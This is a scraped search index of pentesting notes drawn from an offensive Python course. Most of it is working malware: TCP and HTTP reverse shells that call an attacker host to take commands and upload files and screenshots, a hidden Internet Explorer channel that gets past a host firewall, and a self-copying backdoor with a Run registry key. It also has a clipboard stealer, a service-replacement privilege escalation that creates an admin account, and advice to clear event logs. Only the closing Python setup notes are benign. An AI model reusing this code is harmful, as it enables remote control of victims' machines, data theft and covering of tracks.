                                  ","tags":["python","python pentesting","scripting","reverse shell","bypassing techniques","host based firewall"]},{"location":"python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#client-side","title":"Client side","text":"

                                  Make sure that the victim machine (a windows 10) has installed these two python libraries: pypiwin32 and pywin32.

                                  To be run on our victim's machine.

                                  # Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nfrom win32com.client import Dispatch\nfrom time import sleep\nimport subprocess\n\nie = Dispatch(\"InternetExplorer.Application\") # Create browser instance.\nie.Visible = 0 # Make it invisible [ run in background ] (1= visible)\n\n# Paramaeters for POST\ndURL = \"http://192.168.0.152\"  \nFlags = 0\nTargetFrame = 0\n\n\nwhile True:\n    ie.Navigate(\"http://192.168.0.152\") # Navigate to our kali web server (the attacker machine) to grab the hacker commands\n    while ie.ReadyState != 4: # Wait for browser to finish loading.\n        sleep(1)\n\n    command = ie.Document.body.innerHTML \n    command = command.encode() # encode the command\n    if 'terminate' in command.decode():\n        ie.Quit() # quit the IE and end up the process\n        break\n    else:\n        CMD = subprocess.Popen(command.decode(), shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n        Data = CMD.stdout.read()\n        PostData = memoryview( Data ) # in order to submit or post data using COM technique , it requires to  buffer the data first using memoryview\n        ie.Navigate(dURL, Flags, TargetFrame, PostData) # we post the comamnd execution result along with the post parameters which we defined eariler..\n\n    sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","bypassing techniques","host based firewall"]},{"location":"python/hijacking-keepass/","title":"Hijacking Keepass Password Manager","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  # Python For Offensive PenTest: A Complete Practical Course- All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n#pip install pyperclip\n\nimport pyperclip \nimport time\n\nlist = [] # we create a list which will store the clipboard content\n\nwhile True: # infifnite loop to continously check the  clipboard\n\n    if pyperclip.paste() != 'None': # if the clipboard content is not empty ...\n        value = pyperclip.paste() # then we will take its value and put it into variable called value\n\n#now to make sure that we don't get replicated items in our list before appending the value varaible into our list, we gonna check if the value is stored eariler in the first place, if not then this menas this is a new item and we will append it to our list\n\n\n        if value not in list:\n            list.append(value)\n\n        print(list)\n\n        time.sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/","title":"Including cd command into TCP reverse shell","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#client-side","title":"Client side","text":"

                                  To be run on victim's computer.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\nimport subprocess\nimport os\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while packet:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n        f.close()\n    else:\n        s.send('Unable to find out the file'.encode())\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n        if 'terminate' in command.decode():\n            s.close()\n            break\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split('*')\n            try:\n                transfer(s, path)\n            except Exception as e:\n                s.send(str(e).encode())\n                pass\n        elif 'cd' in command.decode():\n            code, directory = command.decode().split('*') # the syntax here is gonna be cd*directory\n            try:\n                os.chdir(directory) # changing the directory \n                s.send(('[+] CWD is ' + os.getcwd()).encode()) # we send back a string mentioning the new CWD Current working directory\n            except Exception as e:\n                s.send(('[-]  ' + str(e)).encode())\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n            s.send(CMD.stdout.read())\n            s.send(CMD.stderr.read())\n\ndef main():\n    connect()\n\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#server-side","title":"Server side","text":"

                                  To be run on attacker's computer.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\n\ndef connect():\n\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 1234))\n    s.listen(1) # define the backlog size for the Queue, I made it 1 as we are expecting a single connection from a single\n    conn, addr = s.accept() # accept() function will retuen the connection object ID (conn) and will return the client(target) IP address and source port in a tuple format (IP,port)\n    print ('[+] We got a connection from', addr)\n\n    while True:\n\n        command = input(\"Shell> \")\n\n        if 'terminate' in command: # If we got terminate command, inform the client and close the connect and break the loop\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        elif '' in command: # If the user just click enter, we will send a whoami command\n            conn.send('whoami'.encode()) \n            print( conn.recv(1024).decode()) \n        else:\n            conn.send(command.encode()) # Otherwise we will send the command to the target\n            print( conn.recv(1024).decode()) # print the result that we got back\n\ndef main():\n    connect()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#using-pyinstaller","title":"Using pyinstaller","text":"

                                  See pyinstaller.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/making-a-screenshot/","title":"Making a screenshot","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell","screenshot capturer"]},{"location":"python/making-a-screenshot/#client-side","title":"Client side","text":"

                                  To be run on the victim's machine.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport requests\nimport os\nimport subprocess\nimport time\n\n\nfrom PIL import ImageGrab # Used to Grab a screenshot\nimport tempfile           # Used to Create a temp directory\nimport shutil             # Used to Remove the temp directory\n\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            files = {'file': open(path, 'rb')}\n            r = requests.post(url, files=files)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n\n    elif 'screencap' in command: #If we got a screencap keyword, then ..\n\n        dirpath = tempfile.mkdtemp() #Create a temp dir to store our screenshot file\n        ImageGrab.grab().save(dirpath + \"\\img.jpg\", \"JPEG\") #Save the screencap in the temp dir\n\n        url = \"http://192.168.0.152:8080/store\"\n        files = {'file': open(dirpath + \"\\img.jpg\", 'rb')}\n        r = requests.post(url, files=files) #Transfer the file over our HTTP\n\n        files['file'].close() #Once the file gets transfered, close the file.\n        shutil.rmtree(dirpath) #Remove the entire temp dir\n\n    else:\n        CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","screenshot capturer"]},{"location":"python/making-your-binary-persistent/","title":"Making your binary persistent","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

                                  In order for a binary to persist, the binary must do three things:

                                  1. To copy itself into a different location. We need source path (current working directory) and destination path, for instance, the Document folder. This means that we need to know the username:

                                  ```cmd\n    c:\\Users\\<username>\\Documents\n```\n

                                  2. To add a registry key pointing to our new exe location. This is done only the first time.

                                  3. For consecutive times, we have to avoid repeating steps 1 and 2.

                                  ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#phases-for-persistence","title":"Phases for persistence","text":"","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#1-system-recognition","title":"1. System recognition","text":"

                                  Getting to know the current working directory + the user profile.

                                  ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#2-copy-the-binary-to-a-different-location","title":"2. Copy the binary to a different location","text":"

                                  If the binary is not found in the destination folder, we can assume this is the first time we're running it. Then:

                                  We will copy the binary to a different location. For that, we need a source path (current working directory) and a destination path, for instance, the Document folder. This means that we need to know the current working directory (for the source path) and the username (for the destination path):

                                  ```cmd\n    c:\\Users\\<username>\\Documents\n```\n

                                  This information was already retrieved in step 1 (System recognition).

                                  ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#3-add-a-registry-key","title":"3. Add a Registry key","text":"

                                  If the binary is not found in the destination folder, we can assume this is the first time we're running it. Then:

                                  We will add a Registry key.

                                  ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#4-fire-up-our-shell","title":"4. Fire up our shell","text":"","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#client-side","title":"Client side","text":"

                                  To be run on our victim's machine.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport requests\nimport os\nimport subprocess\nimport time\nimport shutil \nimport winreg as wreg\n\n#Reconn Phase\npath = os.getcwd().strip('/n')\n\nNull, userprof = subprocess.check_output('set USERPROFILE', shell=True,stdin=subprocess.PIPE,  stderr=subprocess.PIPE).decode().split('=')\n\ndestination = userprof.strip('\\n\\r') + '\\\\Documents\\\\' + 'client.exe'\n\n#If it was the first time our backdoor gets executed, then Do phase 1 and phase 2 \nif not os.path.exists(destination):\n    shutil.copyfile(path+'\\client.exe', destination) #You can replace   path+'\\client.exe' with sys.argv[0] ---> the sys.argv[0] will return the file name\n\n    key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\", 0, wreg.KEY_ALL_ACCESS)\n    wreg.SetValueEx(key, 'RegUpdater', 0, wreg.REG_SZ, destination)\n    key.Close()\n\n\n\n#Last phase is to start a reverse connection back to our kali machine\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            files = {'file': open(path, 'rb')}\n            r = requests.post(url, files=files)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/man-in-the-browser-attack/","title":"Man in the browser attack","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

                                  All the browsers offer to save username/password when you submit these data into a login page, so on the next time you visit the same login page you will see your username/password are automatically filled in without typing a single letter. Also, there's third party software like lastpass can do the same job for you.

                                  If the target was using this method for login, then neither the keylogger nor the clipboard methods will work.

                                  Modern hackers have invented a new attack called -man in the browser- to overcome the above scenario.

                                  In a nutshell, man in the browser attack intercepts the browser API calls and extracts the data (clear text) before it's getting out to the network socket (SSL encrypted).

                                  ","tags":["python","python pentesting","techniques","firefox","browsers"]},{"location":"python/man-in-the-browser-attack/#steps-to-intercept-a-process-api-calls-are-","title":"Steps to intercept a process API calls are:-","text":"

                                  A. Get the Process ID (PID) of the browser process

                                  B. Attach a debugger to this PID

                                  C. Specify the DLL library that you want to intercept

                                  D. Specify the function name and resolve its memory address

                                  E. Set BreakPoint and register a call back function

                                  F. Wait for debug events using debug loop

                                  G. Once the debug event occur ( meaning once the browser calls the function inside the DLL), execute the call back function

                                  H. Return the original process

                                  ","tags":["python","python pentesting","techniques","firefox","browsers"]},{"location":"python/pip/","title":"Pip","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#installation","title":"Installation","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#basic-usage","title":"Basic usage","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#some-interesting-libraries","title":"Some interesting libraries","text":"Library What it does Install More Info Pillow Pillow\u00a0and its predecessor,\u00a0PIL, are the original Python\u00a0libraries for dealing with images. pip install Pillow https://realpython.com/image-processing-with-the-python-pillow-library/","tags":["python","scripting","package manager"]},{"location":"python/privilege-escalation/","title":"Privilege escalation - Weak service file permission","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#setting-up-the-lab","title":"Setting up the lab","text":"

                                  1. Download vulnerable application from https://www.exploit-db.com/exploits/24872 and install it for all users on a windows VM.

                                  2. Create a non admin account in the Windows VM. For instance: - user: nonadmin - password: 123123

                                  3. Restart the windows VM and login as nonadmin user.

                                  4. Open the PhotoDex application and in Task Manager locate the service that gets created by the application. It's called ScsiAccess.\u00e7

                                  5. Open properties of ScsiAccess service and locate the path to executable. It should be something like:

                                  C:\\Program Files\\Photodex\\ProShow PRoducer\\ScsiAccess.exe\n

                                  6. We can replace that file with a malicious service file that will be triggered when opening the Photodex application and get us escalated to admin privileges.

                                  7. Script for windows 7 app. Go to step 8 for windows 10. Jump to step 9 after this step.

                                  # Windows 7\nimport servicemanager\nimport win32serviceutil\nimport win32service\nimport win32api\n\nimport os\nimport ctypes\n\nclass Service(win32serviceutil.ServiceFramework):\n    _svc_name_ = 'ScsiAccess'\n    _svc_display_name_ = 'ScsiAccess'\n\n    def __init__(self, *args):\n        win32serviceutil.ServiceFramework.__init__(self, *args)\n\n    def sleep(self, sec):\n        win32api.Sleep(sec*1000, True)\n\n    def SvcDoRun(self):\n\n        self.ReportServiceStatus(win32service.SERVICE_START_PENDING)\n        try:\n            self.ReportServiceStatus(win32service.SERVICE_RUNNING)\n            self.start()\n\n        except:\n            self.SvcStop()\n    def SvcStop(self):\n        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n        self.stop()\n        self.ReportServiceStatus(win32service.SERVICE_STOPPEED)\n\n    def start(self):\n        self.runflag=True\n\n        f = open('C:/Users/nonadmin/Desktop/priv.txt', 'w')\n        if ctypes.windll.shell32.IsUserAnAdmin() == 0:\n            f.write('[-] We are NOT admin')\n        else:\n            f.write('[+] We are admin')\n        f.close()\n\n    def stop(self):\n        self.runflag=False\n\nif __name__ == '__main__':\n\n\n    servicemanager.Initialize()\n    servicemanager.PrepareToHostSingle(Service)\n    servicemanager.StartServiceCtrlDispatcher()\n    win32serviceutil.HandleCommandLine(Service)\n

                                  We can use py2exe to craft an exe file for that python script:

                                  This setup file will convert the python script scsiaccess.py into an exe file:

                                  from distutils.core import setup\nimport py2exe, sys, os\n\nsys.arg.append(\"py2exe\")\nsetup(\n      options = {'py2exe': {'bundle_files': 1}},\n      windows = [ {'script': \"scsiaccess.py\"}],\n      zipfule = None\n)\n

                                  You can also use pyinstaller:

                                  Pyinstaller --onfile Create_New_Admin_account.py\n

                                  8. Script for Windows 10:

                                  # The order of importing libraries matter. \"servicemanager\" should be imported after win32X. As following:-\n\nimport win32serviceutil\nimport win32service\nimport win32api\nimport win32timezone\nimport win32net\nimport win32netcon\nimport servicemanager\n\n## the rest of the code is still the same\nimport os\nimport ctypes\n\nclass Service(win32serviceutil.ServiceFramework):\n    _svc_name_ = 'ScsiAccess'\n    _svc_display_name_ = 'ScsiAccess'\n\n    def __init__(self, *args):\n        win32serviceutil.ServiceFramework.__init__(self, *args)\n\n    def sleep(self, sec):\n        win32api.Sleep(sec*1000, True)\n\n    def SvcDoRun(self):\n\n        self.ReportServiceStatus(win32service.SERVICE_START_PENDING)\n        try:\n            self.ReportServiceStatus(win32service.SERVICE_RUNNING)\n            self.start()\n\n        except:\n            self.SvcStop()\n    def SvcStop(self):\n        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n        self.stop()\n        self.ReportServiceStatus(win32service.SERVICE_STOPPEED)\n\n    def start(self):\n        self.runflag=True\n\n        USER = \"Hacked\"\n        GROUP = \"Administrators\"\n        user_info = dict (\n            name = USER,\n            password = \"python\",\n            priv = win32netcon.USER_PRIV_USER,\n            home_dir = None,\n            comment = None,\n            flags = win32netcon.UF_SCRIPT,\n            script_path = None\n             )\n        user_group_info = dict (\n            domainandname = USER\n            )\n        try:\n            win32net.NetUserAdd (None, 1, user_info)\n            win32net.NetLocalGroupAddMembers (None, GROUP, 3, [user_group_info])\n        except Exception, x:\n            pass\n        ''' \n        f = open('C:/Users/nonadmin/Desktop/priv.txt', 'w')\n        if ctypes.windll.shell32.IsUserAnAdmin() == 0:\n            f.write('[-] We are NOT admin')\n        else:\n            f.write('[+] We are admin')\n        f.close()\n        '''\n    def stop(self):\n        self.runflag=False\n\nif __name__ == '__main__':\n\n\n    servicemanager.Initialize()\n    servicemanager.PrepareToHostSingle(Service)\n    servicemanager.StartServiceCtrlDispatcher()\n    win32serviceutil.HandleCommandLine(Service)\n

                                  To export into EXE use:

                                  Pyinstaller --onfile Create_New_Admin_account.py`\n

                                  9. Replace the service file, under

                                  C:\\Program Files (x86)\\Photodex\\ProShow Producer`\n

                                  10. Rename the original scsiaccess to scsiaccess123.

                                  11. Put your Python exe as scsiaccess\u00a0 (without .exe).

                                  12. Restart and test- You should see \"Hacked\" account been created.

                                  ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#python-script-to-check-if-we-are-admin-users-on-windows","title":"Python script to check if we are admin users on Windows","text":"
                                  import ctypes\n    if ctypes.windll.shell32.IsUserAnAdmin() == 0:\n        print '[-] We are NOT admin! '\n    else:\n        print '[+] We are admin :) '\n
                                  ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#erasing-tracks","title":"Erasing tracks","text":"

                                  Once you are admin, open Event Viewer and go to Windows Logs. Click right button on Applications and Security and the option \"Clear Logs\".

                                  ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/pyenv/","title":"Pyenv","text":"

                                  Popular Python version management tool. Pyenv allows you to easily install and switch between multiple Python versions on the same machine.

                                  Source: https://github.com/pyenv/pyenv

                                  "},{"location":"python/pyenv/#installation-in-kali","title":"Installation in Kali","text":"

                                  Check out Pyenv where you want it installed. A good place to choose is $HOME/.pyenv (but you can install it somewhere else):

                                  git clone https://github.com/pyenv/pyenv.git ~/.pyenv\n

                                  Optionally, try to compile a dynamic Bash extension to speed up Pyenv. Don't worry if it fails; Pyenv will still work normally:

                                  cd ~/.pyenv && src/configure && make -C src\n

                                  Define environment variable PYENV_ROOT to point to the path where Pyenv will store its data. $HOME/.pyenv is the default. If you installed Pyenv via Git checkout, we recommend to set it to the same location as where you cloned it.

                                  echo 'export PYENV_ROOT=\"$HOME/.pyenv\"' >> ~/.zshrc\n

                                  Add the\u00a0pyenv\u00a0executable to your\u00a0PATH\u00a0if it's not already there

                                  echo 'command -v pyenv >/dev/null || export PATH=\"$PYENV_ROOT/bin:$PATH\"' >> ~/.zshrc \n

                                  run\u00a0eval \"$(pyenv init -)\"\u00a0to install\u00a0pyenv\u00a0into your shell as a shell function, enable shims and autocompletion

                                  echo 'eval \"$(pyenv init -)\"' >> ~/.zshrc \n

                                  Then, if you have ~/.profile, ~/.bash_profile or ~/.bash_login, add the commands there as well. If you have none of these, add them to ~/.profile. No need in this case, where we have ~/.zshrc.

                                  If you wish to get Pyenv in noninteractive login shells as well, also add the commands to ~/.zprofile or ~/.zlogin.

                                  "},{"location":"python/pyenv/#basic-usage","title":"Basic usage","text":"

                                  Install the desired Python versions using pyenv:

                                  pyenv install 3.9.0\n

                                  See installed versions:

                                  pyenv versions\n

                                  Set global python version:

                                   pyenv global 2.7.18\n
                                  "},{"location":"python/python-installation/","title":"Installing python","text":"","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-python-38-on-ubuntu-20045","title":"Installing python 3.8 on Ubuntu 20.04.5","text":"

                                  First, update and upgrade:

                                  sudo apt update && sudo apt upgrade\n

                                  Add PPA for Python old versions. The old versions of Python such as 3.9, 3.8, 3.7, and older are not available to install using the default system repository of Ubuntu 22.04 LTS Jammy JellyFish or 20.04 Focal Fossa. Hence, we need to add a PPA offered by the \u201cdeadsnakes\u201d team to get the old archived Python versions easily.

                                  sudo apt install software-properties-common\n
                                  sudo add-apt-repository ppa:deadsnakes/ppa\n\n# If you get this error:\nAttributeError: NoneType object has no attribute people\n# Try Installing  python3-launchpadlib \nsudo apt-get install  python3-launchpadlib \n

                                  Check python versions you want. Syntax:

                                  sudo apt-cache policy python<version>\n

                                  In my case:

                                  sudo apt-cache policy python3.9\n

                                  Install the version you want:

                                  sudo apt install python3.9\n

                                  Set up a default version in your system:

                                  # Checkout existing versions\nls /usr/bin/python*\n\n# Also, let's check out  whether any version is configured as python alternatives or not. For that run:\nsudo update-alternatives --list python\n\n# If the output is: \u201cupdate-alternatives: error: no alternatives for python\u201d. Then it means there are no alternatives that have been configured, hence let\u2019s do some:\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.9 1\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.10 2\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.8 3\n\n# Switch the default Python version\u00a0\nsudo update-alternatives --config python\n
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#other-methods","title":"Other methods","text":"

                                  No very orthodox but:

                                  # Check current Python pointer\nls -l /usr/bin/python\n\n# Check available Python versions**\nls -l /usr/bin/python*\n\n# Unlink current python version**\ncd /usr/bin\nsudo unlink python\n\n# Select required python version and lin to python command**\nsudo ln -s /usr/bin/python2.7 python\n\n# Confirm change in pointer**\nls -l /usr/bin/python\n
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-python-in-kali","title":"Installing python in Kali","text":"

                                  If you are on Ubuntu 19.10 (or any other version unsupported by the deadsnakes PPA, like it's the case of Kali), you will not be able to install using the deadsnakes PPA.

                                  First, install development packages required to build Python.

                                  sudo apt update\nsudo apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev curl\n

                                  Then download the tarball and extract it:

                                  wget https://www.python.org/ftp/python/3.9.19/Python-3.9.19.tar.xz\ntar -xf Python-3.9.19.tar.xz\n

                                  Once the Python tarball has been extracted, navigate to the configure script and execute it in your Linux terminal with:

                                  cd Python-3.9.19\n./configure\n

                                  The configuration may take some time. Wait until it is successfully finishes before proceeding.

                                  If you want to create an alternative install for python, start the build process:

